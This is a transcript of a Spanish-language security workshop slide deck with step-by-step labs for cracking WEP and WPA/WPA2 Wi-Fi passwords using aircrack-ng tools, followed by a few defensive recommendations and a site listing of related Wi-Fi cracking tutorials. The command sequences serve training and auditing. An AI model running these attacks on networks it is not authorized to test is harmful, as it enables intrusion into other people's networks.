SECURITY DAY PERU. Ataques a las Redes Inalámbricas. Vulnerando Redes Inalámbricas WEP y WPA. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP
|
|
- Alfonso Castilla Hernández
- hace 8 años
- Vistas:
Transcripción
1 SOLUTIONS FOR KEEPING YOUR BUSINESS UP Tel. +(507) Tel. +(1) Aptdo , Paitilla. Panama City, Panama SECURITY DAY PERU Ataques a las Redes Inalámbricas Vulnerando Redes Inalámbricas WEP y WPA Technologies 1
2 Security Day> Perú> Agenda Lab 1. Explotando Vulnerabilidad de WEP con clientes inalámbricos Lab 2. Explotando Vulnerabilidad de WEP sin clientes inalámbricos Lab 3. Explotando Vulnerabilidad de WPA 2
3 Ataque a WEP con clientes Ésta vulnerabilidad aprovecha el empleo de RC4, contiene múltiples debilidades documentadas desde setiembre de La contraseña es simétrica (estática) y se comparte entre los puntos de acceso y los clientes (compartida). El ataque con clientes (repetición) es viable en la mayoría de AP. 3
4 Lab del ataque WEP con clientes Desde nuestro Backtrack, iniciamos el reconocimiento: iwconfig (visualizamos las interfaces inalámbricas) rmmod rtl8187 modprobe rtl8187 (cargamos el módulo de la tarjeta inalámbrica) airmon-ng start wlan0 (iniciamos la tarjeta en modo monitor) airodump-ng mon0 (capturamos los paquetes) Preparamos el ataque de inyección con clientes. rmmod rtl8187 modprobe rtl8187 airmon-ng start wlan0 10 airodump-ng mon0 --encrypt wep -w ximark --bssid 00:19:5b:e0:22:2e -c 10 4
5 Lab del Ataque a WEP con clientes Ejecutamos la asociación al AP aireplay-ng e ximark -a 00:19:5b:e0:22:2e -h 00:c0:ca:19:cd:4b mon0 Realizamos la inyección de paquetes aireplay-ng -3 -e ximark -a 00:19:5b:e0:22:2e -h 00:c0:ca:19:cd:4b mon0 Recuperamos la contraseña del AP aircrack-ng -z -0 ximark-02.cap 5
6 Ataque a WEP sin clientes Ésta vulnerabilidad aprovecha el empleo de RC4, contiene múltiples debilidades documentadas desde setiembre de La contraseña es simétrica (estática) y se comparte entre los puntos de acceso y los clientes (compartida). El ataque sin clientes (fragmentación) es viable en algunos tipos de AP, cuando no, se debe probar korek chop chop. 6
7 Lab del Ataque a WEP sin clientes Desde nuestro Backtrack, iniciamos el reconocimiento: iwconfig (visualizamos las interfaces inalámbricas) rmmod rtl8187 modprobe rtl8187 (cargamos el módulo de la tarjeta inalámbrica) airmon-ng start wlan0 (iniciamos la tarjeta en modo monitor) airodump-ng mon0 (capturamos los paquetes) Preparamos el ataque de fragmentación. rmmod rtl8187 modprobe rtl8187 airmon-ng start wlan0 10 airodump-ng mon0 --encrypt wep -w ximark --bssid 00:19:5b:e0:22:2e -c 10 7
8 Lab del Ataque a WEP sin clientes Ejecutamos el ataque de fragmentación aireplay-ng e ximark -a 00:19:5b:e0:22:2e -h 00:c0:ca:19:cd:4b mon0 aireplay-ng -5 -b 00:19:5b:e0:22:2e -h 00:c0:ca:19:cd:4b mon0 Generamos el paquete a inyectar packetforge-ng -0 -a 00:19:5b:e0:22:2e -h 00:c0:ca:19:cd:4b -k l y fragment xor -w paquete Realizamos la inyección de paquetes aireplay-ng -2 -r paquete mon0 Recuperamos la contraseña del AP aircrack-ng -z -0 ximark-02.cap 8
9 Ataque a WPA/WPA2 Esta vulnerabilidad se basa en la captura del 4 way handshake, realizado en la asociación y autenticación de un cliente y un AP. Afecta a todos los dispositivos que empleen autenticación con cifrado TKIP. 9
10 Lab del ataque WPA/WPA2 Desde nuestro Backtrack, iniciamos el reconocimiento: iwconfig (visualizamos las interfaces inalámbricas) rmmod rtl8187 modprobe rtl8187 (cargamos el módulo de la tarjeta inalámbrica) airmon-ng start wlan0 (iniciamos la tarjeta en modo monitor) airodump-ng mon0 (capturamos los paquetes) Preparamos el ataque de inyección con clientes. rmmod rtl8187 modprobe rtl8187 airmon-ng start wlan0 10 airodump-ng mon0 -w ximark --bssid 00:19:5b:e0:22:2e -c 10 10
11 Lab del ataque a WPA/WPA2 Ejecutamos la asociación al AP aireplay-ng a 00:19:5b:e0:22:2e -c 00:c0:ca:19:cd:4b mon0 Recuperamos la contraseña del AP aircrack-ng w /carpeta/diccionario ximark-02.cap 11
12 Ataques a las Redes Inalámbricas> Soluciones Emplear contraseñas largas que no se puedan ubicar en diccionarios. No emplear WEP o WPA/WPA2 PSK en entornos empresariales. Actualice o reemplace los equipos que sólo soporten WEP. No se conecten a AP sospechosos. 12
ASALTANDO REDES WI-FI WEP / WPA
ASALTANDO REDES WI-FI WEP / WPA Aetsu alpha.aetsu@gmail.com Esta obra se encuentra bajo la licencia Creative Commons 3.0 España: 1 Cifrado WEP Todos los ataques En esta parte del manual explicaré de forma
Más detallesPREGUNTAS. Sí, preguntas al comienzo de la charla... =) - Quienes NO tienen redes inalámbricas en su casa?
PREGUNTAS Sí, preguntas al comienzo de la charla... =) - Quienes NO tienen redes inalámbricas en su casa? - Quienes NO tienen redes WIFI en su trabajo? - Quienes utilizan WEP? - Quienes utilizan WPA o
Más detallesAuditoria Wireless. Cracking WEP & WPA keys. Jorge Luis Hernandez C. lesthack@gmail.com http://lesthack.com.mx. Linux/Aircrack
Auditoria Wireless Cracking WEP & WPA keys Jorge Luis Hernandez C. lesthack@gmail.com http://lesthack.com.mx Linux/Aircrack Contenido Introducción WEP WPA Practicas Part 1 Razones por las cuales tomé el
Más detallesWEP, WPA/WPA2 Cracking
WEP, WPA/WPA2 Cracking By: Alfa-Omega Introduccion En este manual explicare como crackear claves wep, wpa y wpa2, para ello utilizare el live cd de backtrack 3 (beta) y la suite aircrack (la suite aircrack
Más detallesGuillermo López Leal, 2IM1 Introducción a la Seguridad Universidad Nebrija
Guillermo López Leal, 2IM1 Introducción a la Seguridad Universidad Nebrija Avisos Sólo es una demostración con fines educativos [en serio, en España no es ilegal, pero en otros países sí] No hagáis nada
Más detallesEL ARTE DEL HACKING. Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat.mexico@gmail.com
Página 1 Edición patrocinada por WhiteHat México Descubre como es el Arte del Hacking de una visión de un White Hat. Por LSCA,CEH,ICSCE Carlos Alberto Castruita Rodríguez Edición Independiente 2015 Edición
Más detallesSECURITY DAY PERU. Ataques a la familia de Sistemas Operativos Windows. Explotando Vulnerabilidades a Servicios / Ataques a Clientes.
SOLUTIONS FOR KEEPING YOUR BUSINESS UP Email: info@ximark.com Tel. +(507) 271 5951 Tel. +(1) 928 752 1325 Aptdo. 55-0444, Paitilla. Panama City, Panama SECURITY DAY PERU Ataques a la familia de Sistemas
Más detallesSeguridad en redes inalámbricas. Vulnerabilidades del protocolo WEP
Seguridad en redes inalámbricas Vulnerabilidades del protocolo WEP Introducción Qué vamos a hacer? Observar fallos del protocolo WEP. Utilizar esos fallos para obtener la clave de una red wireless asegurada
Más detallesRedes. Herramientas de red en GNU/Linux. Desactivar / activar bluetooth. rfkill block bluetooth. rfkill unblock bluetooth. Todas las interfaces de red
2016/01/27 19:48 1/6 Redes Redes Herramientas de red en GNU/Linux Desactivar / activar bluetooth rfkill block bluetooth rfkill unblock bluetooth Todas las interfaces de red ifconfig ifconfig wlan0 wlan0:
Más detallesInseguridad Wireless. Presentación Seguridad en Wireless Saltar la seguridad Wardriving Perversiones Cierre
Inseguridad Wireless Presentación Seguridad en Wireless Saltar la seguridad Wardriving Perversiones Cierre Presentación E-MIPS Electrónica e Informática ekoparty security conference NO trabajo en seguridad
Más detallesRedes y servicios móviles
Redes y servicios móviles Prácticas de laboratorio José Ángel Vallejo Pinto (vallejo@uniovi.es) Universidad de Oviedo Área de Redes y servicios móviles Prácticas de laboratorio 1/7 Auditoría de seguridad
Más detallesSECURITY DAY PERU. Ataques a las Aplicaciones Web. Explotación de Aplicaciones Web. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP
SOLUTIONS FOR KEEPING YOUR BUSINESS UP Email: info@ximark.com Tel. +(507) 271 5951 Tel. +(1) 928 752 1325 Aptdo. 55-0444, Paitilla. Panama City, Panama SECURITY DAY PERU Ataques a las Aplicaciones Web
Más detallesGuía No. 1 Pruebas básicas en tarjeta WIFI para pruebas de seguridad
Guía No. 1 Pruebas básicas en tarjeta WIFI para pruebas de seguridad Índice de contenido Guía No. 1 Pruebas básicas en tarjeta WIFI para pruebas de seguridad... 1 Información de apoyo a la práctica...
Más detalles#breaking80211. Esta obra se encuentra bajo la licencia Creative Commons 3.0 España:
#breaking80211 Aetsu Esta obra se encuentra bajo la licencia Creative Commons 3.0 España: 1 Índice Introducción... 3 Materiales/Herramientas utilizados... 4 Conceptos básicos... 5 -> Cambiar dirección
Más detallesTUTORIAL DE AIRCRACK-NG
TUTORIAL DE AIRCRACK-NG Taller Realizado en FLISOL Los Ángeles Abril 25 de 2009.- Paolo Norambuena paolo.norambuena@gmail.com AIRCRACK-NG Esta es una guía con fines educativos para el uso y manipulación
Más detallesSEGURIDAD EN REDES WLAN
UNIVERSIDAD TECNOLÓGICA NACIONAL -FACULTAD REGIONAL LA PLATA- SISTEMAS DE TRANSMISIÓN Y REDES INALÁMBRICAS SEGURIDAD EN REDES WLAN 1 Ing. RAPALLINI, José A. Ing. ROQUÉ, Francisco E. INTRODUCCIÓN SEGURIDAD
Más detallesTrabajo Práctico: Cracking WEP
Universidad de Buenos Aires Facultad De Ingeniería 2 do Cuatrimestre 2011 Trabajo Práctico: INTEGRANTES De Roovers, Raúl - 84.248 nari77@gmail.com Carracedo, Leandro - 83.291 leandrocarracedo@gmail.com
Más detalles30 de Septiembre de 2010 Seminario de Tendencias y Evolución de las Tecnologías de la Información y Comunicaciones en Chile
30 de Septiembre de 2010 Seminario de Tendencias y Evolución de las Tecnologías de la Información y Comunicaciones en Chile Paulo Colomés F. Docente Universidad Tecnológica de Chile Inacap Instructor CCNA
Más detalles1. Configuración de una tarjeta de red en Linux...2. 2. Medidas de seguridad a configurar en el router...5
1. Configuración de una tarjeta de red en Linux...2 1.1 Comprobar que la tarjeta de red está detectada... 2 1.2 Comprobar la configuración... 3 1.3 Ficheros de configuración de la red en Linux... 3 1.3.1
Más detallesIntegrantes: Manuel Ramírez Carlos Polanco Bernardo Farías Profesor: Agustín J. González
Integrantes: Manuel Ramírez Carlos Polanco Bernardo Farías Profesor: Agustín J. González Introducción WLAN es una amplia red inalámbrica que permite conectar un equipo a la red para acceder a Internet,
Más detallesPara poder obtener la clave de una red con cifrado WPA/WPA2, debemos capturar el Handshake de algún cliente y luego desencriptarlo.
Introducción Para poder obtener la clave de una red con cifrado WPA/WPA2, debemos capturar el Handshake de algún cliente y luego desencriptarlo. Para lo que no sepan lo que es el Handshake se genera en
Más detallesCrackin WiFi networks with security enabled
Crackin WiFi networks with security enabled En el articulo sobre cómo configurar la conexión a Internet ya hablamos de las diferentes formas que hay para proteger una red wireless (Wi-Fi), de las cuales
Más detallesRedes WPA/WPA2 SU VULNERABILIDAD JAVIER RUZ MALUENDA BASTIAN RIVEROS VASQUEZ ANGEL VARAS ESCOBAR
Redes WPA/WPA2 SU VULNERABILIDAD JAVIER RUZ MALUENDA BASTIAN RIVEROS VASQUEZ ANGEL VARAS ESCOBAR Resumen A través de las redes con seguridad WPA-WPA2 mediante su descripción y características principales
Más detallesConsideraciones Generales: Tradicionalmente, debido al medio de transmisión físico, las redes cableadas son más seguras que las redes inalámbricas.
Consideraciones Generales: Tradicionalmente, debido al medio de transmisión físico, las redes cableadas son más seguras que las redes inalámbricas. Podemos pensar de forma hipotética en "aislar" una red
Más detallesSeguridad en Redes Inalámbricas Leonardo Uzcátegui
Seguridad en Redes Inalámbricas Leonardo Uzcátegui Seguridad en WI-FI Fundamentos Los paquetes de información en las redes inalámbricas viajan en forma de ondas de radio. Las ondas de radio (en principio)
Más detallesLección 12: Seguridad en redes Wi Fi
Lección 12: Seguridad en redes Wi Fi D. Raúl Siles raul@taddong.com Fundador y Analista de Seguridad de Taddong Introducción a la seguridad de las redes Wi Fi Redes inalámbricas o redes Wi Fi Estándares
Más detallesConceptos. Existen 3 tipos de frames dentro de una WLAN:
Conceptos WLAN Wireless local área network, esta será nuestra red inalámbrica la cual tendremos como objetivo a lo largo del taller WEP Seguridad equivalente a cableado (Wired equivalent Protection) WPA
Más detallesGuía 3. Identificando SSID ocultos y Evadiendo filtros MAC del AP
Guía 3. Identificando SSID ocultos y Evadiendo filtros MAC del AP Índice de contenido Guía 3. Identificando SSID ocultos y Evadiendo filtros MAC del AP... 1 Ataque III Descifrando claves WEP... 2 Fase
Más detallesIntroducción a la Seguridad WiFi con Aircrack-ng. Thomas d Otreppe, Author of Aircrack-ng
Introducción a la Seguridad WiFi con Aircrack-ng Thomas d Otreppe, Author of Aircrack-ng 1 IEEE 802.11 Institute of Electrical and Electronics Engineers Autoridad Líder Segmentada en Comités y grupos de
Más detallesIntroducción a la Seguridad WiFi con Aircrack-ng. Thomas d Otreppe, Author of Aircrack-ng
Introducción a la Seguridad WiFi con Aircrack-ng Thomas d Otreppe, Author of Aircrack-ng 1 IEEE 802.11 Institute of Electrical and Electronics Engineers Autoridad Líder Segmentada en Comités y grupos de
Más detallesSistemas de seguridad en redes inalámbricas: WEP, WAP y WAP2
Sistemas de seguridad en redes inalámbricas: WEP, WAP y WAP2 Calle San Rafael, 14 28108 Alcobendas (Madrid) 902 90 10 20 www.acens.com Introducción Actualmente una de las formas más utilizadas para conectarse
Más detallesConfiguración de un punto de acceso inalámbrico
0 - Conexión Configuración de un punto de acceso inalámbrico Objetivo: Configuración de un punto de acceso (Senao 3054 CB3 Plus deluxe) a través del interface web. Diferenciando los modos: Bridge y AP.
Más detallesProtocolos y técnicas alternativas al WEP. En este capítulo se presentan algunos protocolos y técnicas que ofrecen mayores
Capítulo 4 Protocolos y técnicas alternativas al WEP. En este capítulo se presentan algunos protocolos y técnicas que ofrecen mayores garantías en seguridad en redes inalámbricas, eliminando las debilidades
Más detallesAplicación de tecnologías Wireless para operativas en situaciones de emergencia
Aplicación de tecnologías Wireless para operativas en situaciones de emergencia Javier Coso - Mayo 2007 Dirección General de Protección Civil y Emergencias - Red Radio de Emergencia Aplicación de tecnologías
Más detallessanson seguridadwireless.net
Este manual ha sido creado por sanson, para seguridadwireless.net en colaboracion con Aqprox La intención del mismo es divulgar los conocimientos que he ido adquiriendo durante estos años El manual es
Más detallesBRUTEFORCE WPS CON INFLATOR
BRUTEFORCE WPS CON INFLATOR Por Sergio Baamonde Álvarez En este artículo trataremos cómo aprovecharnos de una vulnerabilidad en el protocolo WPS para obtener la clave de seguridad WPA de una red inalámbrica
Más detallesAgenda. Introducción Tecnologías Wireless: Clasificación Dispositivos Wireless Mecanismos de autenticación WEP y WPA
Wireless Hacking Agenda Introducción Tecnologías Wireless: Clasificación Dispositivos Wireless Mecanismos de autenticación WEP y WPA Autenticación Abierta Autenticación por PSK Autenticación por Dirección
Más detallesEn internet es muy común pillar tutoriales para asegurar nuestra red WIFI con una contraseña WEP, ya
En internet es muy común pillar tutoriales para asegurar nuestra red WIFI con una contraseña WEP, ya que este tipo de cifrado sigue siendo más utilizado por el usuario de casa. Tomaremos esta constante
Más detallesAuditoría Wireless: WiFiSlax 2.0
Auditoría Wireless: WiFiSlax 2.0 Tecnologías de Red Juan Esparza Torregrosa Andrea Cascant Vañó 1 Diana Aparisi Martín Contenido Introducción al mundo Wireless...4 Qué es WLAN y WIFI?...4 Cuáles son los
Más detallesGuía de instalación rápida DPR-1260. with 3G Mobile Video
Guía de instalación rápida DPR-1260 Wireless Wireless Servidor G de Print USB impresión 2.0 USB Server multifunción with 3G Mobile Video Adapter Requisitos del sistema Red inalámbrica 802.11b/g o por cable
Más detallesSeguridad Y Auditoria Wireless
Seguridad Y Auditoria Wireless Integrantes: -Héctor Durán -Katherine Zumelzu Profesor: Rodrigo Tapia Santis Índice Contenido Seguridad... 3 Auditoria... 3 Pero qué es Seguridad y Auditoría Wireless?...
Más detallesFacultad de Ciencias y Tecnología
Facultad de Ciencias y Tecnología TEORÍA Y APLICACIÓN DE LA INFORMÁTICA 2 SEGURIDAD WIFI Alumna: María Isabel Ortíz Gómez. Matrícula Nº: 49.743. Curso: 5º - 10º Semestre. Profesor: Juan de Urraza Asunción
Más detallesAuditoria de Redes. Patrick Hernández Cuamatzi
Auditoria de Redes Patrick Hernández Cuamatzi Redes de Área Local Uso generalizado de sistemas y equipos de cómputo. Derivado de esto surge la necesidad de comunicarse entre equipos, lo que conlleva la
Más detallesPRACTICA DE REDES Redes Ad Hoc
PRACTICA DE REDES Redes Ad Hoc En esta práctica vamos a proceder a montar una red ad hoc, es decir, dos o más dispositivos conectados entre sí directamente de manera inalámbrica, sin ningún tipo de punto
Más detallesManual de configuración de la red inalámbrica. eduroam. en Nokia (Symbian S60)
Manual de configuración de la red inalámbrica eduroam en Nokia (Symbian S60) Manual de configuración de la red inalámbrica eduroam en Nokia (Symbian S60) Índex Introducción... 1 1 Instalación del certificado
Más detallesCapítulo 1. Introducción
Capítulo 1. Introducción Nombre del Tema Aspectos de seguridad en aplicaciones basadas en WIFI. Asesor: Dr. Oleg Starostenko Basarab Actualidad y Definición del problema Desde hace ya tiempo nos hemos
Más detallesManual de acceso a unileon
Manual de acceso a unileon Manual de acceso a unileon... 1 1 Introducción... 2 2 Alta en servicios añadidos.... 3 3 Acceso a la red... 4 3.1 Windows XP... 4 3.2 Otros sistemas operativos... 9 4 Requisitos
Más detallesMetodología para la verificación de la seguridad en redes WI-FI residenciales y PYME.
Metodología para la verificación de la seguridad en redes WI-FI residenciales y PYME. Methodology for testing network security residential and SME WI-FI. Victor Cuchillac ISSN 1992-6510 40 Año 14, N 40,
Más detallesAuditoría WiFi. Departamento de Sistemas Telemáticos y Computación (GSyC) gsyc-profes (arroba) gsyc.es. Diciembre de 2013
Auditoría WiFi Departamento de Sistemas Telemáticos y Computación (GSyC) gsyc-profes (arroba) gsyc.es Diciembre de 2013 GSyC - 2013 Auditoría WiFi 1 c 2013 GSyC Algunos derechos reservados. Este trabajo
Más detallesTítulo: Técnicas de ataque sobre clientes Wi-Fi. Fecha: Jueves, 30 de octubre 9:30 a 20:00h. Formador: Raúl Siles
Título: Técnicas de ataque sobre clientes Wi-Fi Fecha: Jueves, 30 de octubre 9:30 a 20:00h Formador: Raúl Siles Raúl Siles es fundador y analista de seguridad de DinoSec. Durante más de una década ha aplicado
Más detallesCONFIGURACIÓN DEL SOFTWARE ODYSSEY PARA LA CONEXIÓN A LA RED INALÁMBRICA DE LA UPM. Mac OS X
CONFIGURACIÓN DEL SOFTWARE ODYSSEY PARA LA CONEXIÓN A LA RED INALÁMBRICA DE LA UPM Mac OS X Contenido Mac OS X... 3 Configuración del software Odyssey... 3 Configuración de perfiles adicionales... 9 Redes
Más detallesCENTRO DE INVESTIGACIÓN Y DE ESTUDIOS AVANZADOS DEL IPN
CENTRO DE INVESTIGACIÓN Y DE ESTUDIOS AVANZADOS DEL IPN Guía de configuración para establecer una conexión a la red icinvestav con el Sistema Operativo Windows 7. En este documento se describen los pasos
Más detallesTEMA 7: Configuraciones básicas en red.
TEMA 7: Configuraciones básicas en red. Objetivos: Aprendizaje de la configuración de red cableada e inalámbrica en Ubuntu. Conocimiento de la utilización de interfaces de red inalámbricas compatibles
Más detallesSeguridad en UDCWIFI
Seguridad en UDCWIFI Índice Introducción Seguridad en redes inalámbricas WIFI WEP, WPA Y 802,11i: Descripción, Debilidades y Ataques Caso concreto: UDCWIFI Introducción Hablar de seguridad en redes inalámbricas,
Más detallesWPA vs WPA2. Ana Hernández Rabal 21-12-2007
WPA vs WPA2 Ana Hernández Rabal 21-12-2007 Índice Introducción WPA vs WPA2 Autenticación PSK 802.1x EAP EAPOL RADIUS Generación e intercambio de llaves Vulnerabilidades WPA Ataques WPA / WPA2-PSK Líneas
Más detallesCablemodem WIFI Cisco DPC2420 Manual del usuario
TeleCentro BANDA ANCHA 0 Cablemodem WIFI Manual del Usuario Marca: Cisco (Scientific Atlanta) Modelo: DPC2420 IMPORTANTE: el presente manual está destinado a usuarios avanzados que requieren, por sus propios
Más detallesConfiguración básica del Router WIFI Zyxel NBG334W para el servicio AVIPLUS (Iberbanda) Modelo: Zyxel NBG334W Versión: 3.60(BGX.1)
Configuración básica del Router WIFI Zyxel NBG334W para el servicio AVIPLUS (Iberbanda) Modelo: Zyxel NBG334W Versión: 3.60(BGX.1) ... 6... 7... 14... 15... 18... 20... 21... 22... 23... 24... 27... 27...
Más detallesTUTORIAL: Cómo hacer más segura nuestra red MAC OS X
TUTORIAL: Cómo hacer más segura nuestra red MAC OS X TABLA DE CONTENIDOS INTRODUCCIÓN 3 CAMBIAR CONTRASEÑA 4 FILTRAR EL ACCESO POR MAC 5 CIFRADO WEP O WPA 6 DESACTIVAR EL BROADCASTING SSID 6 DESACTIVAR
Más detallessanson seguridadwireless.net
Este manual ha sido creado por sanson, para seguridadwireless.net La intención del mismo es divulgar los conocimientos que he ido adquiriendo durante estos años El manual es de libre distribución y eres
Más detallesGuía para la configuración de la red inalámbrica corporativa de la Universidad de Oviedo
Guía para la configuración de la red inalámbrica corporativa de la Universidad de Oviedo Configuración de la red inalámbrica con cifrado WPA (Uniovi- WiFi) y autenticación PEAP. Detección de las redes
Más detallesManual de Configuración WI-FI Alumnos UTP
Mesa de Ayuda Manual de Configuración WI-FI Alumnos UTP Versión 1.0 Publicado: 09/07/2014 Copyright 2014 Universidad Tecnológica del Perú S.A.C No esta permitida su distribución sin el consentimiento previo
Más detallesEn la imagen de abajo nos encontramos con la opción de "Clonar" la dirección MAC de la placa de red de nuestra PC, esto se hace en casos en los que
En este tutorial vamos a ver lo pasos para configurar la conexión a internet del Router Wireless NG-3304N junto con algunos parámetros básicos sobre la configuración Wireless. Luego de encender el router
Más detallesAtaques Wifi Riesgos y Contramedidas. Ing. PPT CISO Jorge Luis Martinez Valda
Ataques Wifi Riesgos y Contramedidas Ing. PPT CISO Jorge Luis Martinez Valda About Me About Me Ingeniero de Sistema egresado de la Universidad del Valle desde el 2008. Fan de la seguridad informatica.
Más detallesSeguridad en Redes Inalámbricas
Seguridad en Redes Inalámbricas Son muchos los motivos para preocuparnos por la seguridad de una red inalámbrica. Por ejemplo, queremos evitar compartir nuestro ancho de banda públicamente. Tendremos situaciones
Más detallesSeguridad en Redes Wireless 802.11x
Seguridad en Redes Wireless 802.11x Redes de Ordenadores Móviles Departamento de Sistemas Telemáticos y Computación (GSyC) gsyc-profes@gsyc.es Diciembre de 2009 GSyC - 2009 Seguridad en redes Wireless
Más detallesAuditoría de redes WiFi
Auditoría de redes WiFi Redes de Ordenadores Móviles - GSyC Índice 0. Introducción 1 1. Configuración de una red 820.11 ad-hoc con cifrado WEP 2 1.1. Configuración de la máquina virtual ALICE.......................
Más detallesGuía rápida Arris TG862
Guía rápida Arris TG862 1. Introducción El nuevo cable módem router Arris TG862 introduce nuevas funcionalidades que hasta ahora ningún equipo doméstico era capaz de hacer. Esta guía pretende servir para
Más detallesMUM Argentina 2015 Buenos Aires. CAPsMAN para redes empresariales
MUM Argentina 2015 Buenos Aires CAPsMAN para redes empresariales Prozcenter - Quienes somos? Empresa joven, con 12 años de experiencia en Networking y TI. Compuesta por profesionales de la industria tecnológica
Más detallesTRABAJO FIN DE MÁSTER
UNIVERSIDAD OBERTA DE CATALUNYA UNIVERSIDAD ROVIRA I VIRGILI UNIVERSIDAD AUTÓNOMA DE BARCELONA MÁSTER INTERUNIVERSITARIO DE SEGURIDAD DE LAS TECNOLOGIAS DE LA INFORMACIÓN Y DE LAS COMUNICACIONES (MISITIC)
Más detallesExamen Cisco Online CCNA4 V4.0 - Capitulo 6. By Alen.-
Cuáles de las siguientes son dos afirmaciones verdaderas acerca de DSL? (Elija dos opciones). los usuarios se encuentran en un medio compartido usa transmisión de señal de RF el bucle local puede tener
Más detallesGuía de conexión. Sistemas operativos compatibles. Guía de conexión. Página 1 de 5
Página 1 de 5 Guía de conexión Sistemas operativos compatibles Con el CD Software y documentación, puede instalar el software de la impresora en los siguientes sistemas operativos: Windows 8 Windows 7
Más detallesDepartamento de Sistemas Telemáticos y Computación (GSyC) Diciembre de 2012
Sniffers Departamento de Sistemas Telemáticos y Computación (GSyC) gsyc-profes (arroba) gsyc.es Diciembre de 2012 GSyC - 2012 Captura de tráfico con Sniffers 1 c 2012 GSyC Algunos derechos reservados.
Más detallesGuía de configuración de Wi-Fi
Guía de configuración de Wi-Fi N.º de modelo Serie SP 212/SP 213 Introducción Hay dos modos de conexión de redes LAN inalámbricas: el modo de infraestructura para conectarse a través de un punto de acceso
Más detallesProcedimiento de configuración básica del Router Wireless Broadband Router para el servicio AVIPLUS (Iberbanda) Modelo: WR514R2
Procedimiento de configuración básica del Router Wireless Broadband Router para el servicio AVIPLUS (Iberbanda) Modelo: WR514R2 Índice 1 Introducción...3 2 Antes de empezar...4 2.1 Datos de configuración...4
Más detallesPrincipios básicos de las redes propias Nokia N93i-1
l Principios básicos de las redes propias Nokia N93i-1 Principios básicos de las redes propias 2ª edición ES, 9200197 Introducción Con la arquitectura UPnP y una red de área local inalámbrica (WLAN), es
Más detallesWIFI MODO MASTER FLISOL 2009 RENZO ALBERTO TACO COAYLA. e-mail: renzo@itsperu.com http://www.itsperu.com blog: http://www.oxaseis.
WIFI MODO MASTER FLISOL 2009 RENZO ALBERTO TACO COAYLA e-mail: renzo@itsperu.com url: http://www.itsperu.com blog: http://www.oxaseis.tk CONSULTORIA EMPRESARIAL EN TI Agenda Redes WIFI. Tipos de Nodos
Más detallesRecomendaciones para la instalación de un sistema WIFI
Recomendaciones para la instalación de un sistema WIFI La Dirección de Servicios Tecnologías de Información (STI) ha evaluado el sistema WIFI y esta liberando aplicaciones inalámbricas en las redes de
Más detallesWardriving Perú: Riesgos Ocultos. Jimmy Arthur Villanueva Llerena Especialista en redes y comunicaciones de datos
Wardriving Perú: Riesgos Ocultos Jimmy Arthur Villanueva Llerena Especialista en redes y comunicaciones de datos Introducción La irrupción de la nueva tecnología basada en redes inalámbricas ha proporcionado
Más detallesGUÍA DE CONFIGURACIÓN EN MODO PUNTO DE ACCESO PARA LA C150RUSM Y LA C300RU v3.0
GUÍA DE CONFIGURACIÓN EN MODO PUNTO DE ACCESO PARA LA C150RUSM Y LA C300RU v3.0 Los modelos C150RUSM y C300RU v3.0 son posibles de configurar en modo punto de acceso. Este modo le permitirá convertir su
Más detallesLABORATORIO FUNDAMENTOS DE REDES PERIODO AGOSTO-DICIEMBRE 2007
LABORATORIO FUNDAMENTOS DE REDES PERIODO AGOSTO-DICIEMBRE 2007 Práctica No. 2 Tema: Tiempo de la práctica: Elementos requeridos: WLAN 2 horas Punto de acceso inalámbrico, patch cord conexión directa, tarjetas
Más detallesConfiguración básica del Router WIFI WGRWAN 54M para el servicio AVIPLUS (Iberbanda) Modelo: WGRWAN 54M
Configuración básica del Router WIFI WGRWAN 54M para el servicio AVIPLUS (Iberbanda) Modelo: WGRWAN 54M Índice Índice...2 1 Introducción...3 2 Antes de empezar...4 2.1 Datos de configuración...4 2.2 Conexiones...4
Más detallesCENTRO DE INVESTIGACIÓN Y DE ESTUDIOS AVANZADOS DEL IPN
CENTRO DE INVESTIGACIÓN Y DE ESTUDIOS AVANZADOS DEL IPN Guía de configuración para establecer una conexión a la red icinvestav con el Sistema Operativo Windows Vista. En este documento se describen los
Más detallesCCNA 3 EXAMEN 7 SU PUNTUACION ES 100%. RESPUESTAS CORRECTAS AL PRIMER INTENTO: 21/21 EJERCICIO COMPLETADO
CCNA 3 EXAMEN 7 SU PUNTUACION ES 100%. RESPUESTAS CORRECTAS AL PRIMER INTENTO: 21/21 EJERCICIO COMPLETADO Ver las preguntas una a una 1. 1.- Cuáles son las dos condiciones que favorecieron la adopción
Más detallesProyecto 2: Seguridad de Redes Inalámbricas
Proyecto 2: Seguridad de Redes Inalámbricas Alumnos: JUAN MIGUEL LÓPEZ RUBIO ROCÍO DOMÍNGUEZ RODRÍGUEZ RUBÉN BENÍTEZ TIRADO Fecha de entrega: Grupo: 21 Proyecto: 2 Modulo: Redes 1 Índice de contenido 1
Más detallesCONFIGURACIÓN WINDOWS VISTA
CONFIGURACIÓN DE REDES INALÁMBRICAS Para conectar un adaptador inalámbrico a un punto de acceso mediante la funcionalidad de gestión de Windows Vista se debe acceder en primer lugar al apartado Conectar
Más detallesíndice INTRODUCCIÓN...15
índice INTRODUCCIÓN...15 capítulo 1. hackers y seguridad...19 1.1 amenazas informáticas...20 1.1.1 Ataques activos...21 1.1.2 Ataques pasivos...22 1.2 hackers...23 1.2.1 Habilidades básicas...24 1.3 autoevaluación
Más detalles1.- Información general...2 2.- Instalación y configuración del software necesario...3. 3.- Configuración del cliente de red inalámbrico...
CONFIGURACIÓN DE PDAs PARA LA CONEXIÓN A LA RED INALÁMBRICA DE LA UAL 1.- Información general....2 2.- Instalación y configuración del software necesario...3 2.1 Instalar el cliente SecureW2... 3 2.2 Configuración
Más detallesAmpliando el arsenal de ataque Wi-Fi. www.layakk.com @layakk
Ampliando el arsenal de ataque Wi-Fi www.layakk.com @layakk David Pérez José Picó david.perez@layakk.com jose.pico@layakk.com Agenda Introducción Herramientas lk_wiclitatoo.py lk_wifi_device_finder.py
Más detallesRedes WAN VPN. Esteban De La Fuente Rubio esteban@delaf.cl L A TEX. 13 may 2011. Universidad Andrés Bello
VPN esteban@delaf.cl L A TEX Universidad Andrés Bello 13 may 2011 Tabla de contenidos 1 2 Tipos de VPN Funcionamiento 3 IPSec OpenVPN Empleados de forma remota. Disponer de trabajadores en sucursales.
Más detallesProyecto: Seguridad en Redes Wifi
Redes de Computadores Proyecto: Seguridad en Redes Wifi Alumnos: - Gonzalo Vera Portilla - Cristian Wiche Latorre - Pedro Zepeda Pozo Profesor: Agustín González Redes de Computadores 1 Índice 1. Introducción
